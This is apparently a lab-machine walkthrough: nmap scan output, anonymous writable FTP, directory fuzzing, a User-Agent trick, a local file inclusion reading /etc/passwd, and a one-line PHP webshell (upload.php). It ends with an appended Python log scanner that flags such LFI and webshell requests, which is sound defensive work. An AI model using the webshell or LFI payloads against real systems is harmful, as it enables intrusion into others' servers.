PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.125
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
| 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
The FTP server allows anonymous login, but there is nothing inside except a writable pub folder:
┌──(kali㉿VirtualBox)-[~]
└─$ ftp 192.168.125.14 -p 21
Connected to 192.168.125.14.
220 (vsFTPd 3.0.3)
Name (192.168.125.14:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls -la
229 Entering Extended Passive Mode (|||62841|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Feb 08 2020 .
drwxr-xr-x 3 0 0 4096 Feb 08 2020 ..
drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub
Directory fuzzing also turned up nothing interesting:
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.14 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.125.14/javascript/]
/manual (Status: 301) [Size: 317] [--> http://192.168.125.14/manual/]
/robots.txt (Status: 200) [Size: 59]
/server-status (Status: 403) [Size: 279]
/robots.txt is just a troll. However, we can change our User-Agent to that of a search engine to view the hidden content, using this extension:
https://add0n.com/useragent-switcher.html?version=0.4.8&type=install
Simply change it to Google, click Apply, and refresh the webpage. We then land in the /secret_information/ directory, which introduces us to a DNS Zone Transfer attack.
Even though I thought that was the intended path, the page has an LFI in it anyway:
http://192.168.125.14/secret_information/?lang=/etc/passwd
From /etc/passwd we can see that there is a user called tom on this machine.
So far we know two things: we have writable access to FTP, and we have an LFI.
┌──(kali㉿VirtualBox)-[~]
└─$ cat upload.php
<?php system($_GET['cmd']);?>
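As a defender's counterpart to the chain above, here is an added example (not part of the original writeup) that scans Apache access-log lines for the request patterns this attack leaves behind: an absolute path or traversal sequence in a query parameter such as lang, and a cmd parameter like the one the webshell above reads. The log lines are constructed, and /srv/ftp/pub is an assumed location for the FTP pub directory.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format; not taken from the
# target machine. /srv/ftp/pub is an assumed location for the FTP pub directory.
SAMPLE_LOG = """\
192.168.49.125 - - [08/Feb/2020:10:00:01 +0000] "GET /secret_information/?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.49.125 - - [08/Feb/2020:10:00:07 +0000] "GET /secret_information/?lang=/etc/passwd HTTP/1.1" 200 2048 "-" "Googlebot/2.1"
192.168.49.125 - - [08/Feb/2020:10:00:12 +0000] "GET /secret_information/?lang=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "Googlebot/2.1"
192.168.49.125 - - [08/Feb/2020:10:01:30 +0000] "GET /secret_information/?lang=/srv/ftp/pub/upload.php&cmd=id HTTP/1.1" 200 77 "-" "Googlebot/2.1"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return the LFI / webshell indicators found in one request target (empty if clean)."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded payloads.
        value = unquote(value)
        if value.startswith("/"):
            findings.append(f"{name}: absolute path include ({value})")
        if ".." in value:
            findings.append(f"{name}: directory traversal ({value})")
        if name == "cmd":
            findings.append("cmd parameter: possible webshell command")
    return findings


def scan_log(text):
    """Return (client_ip, target, findings) for every flagged request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target)
        for finding in findings:
            print("   ", finding)
```

Only the last three sample lines are flagged; the benign lang=en request produces no findings.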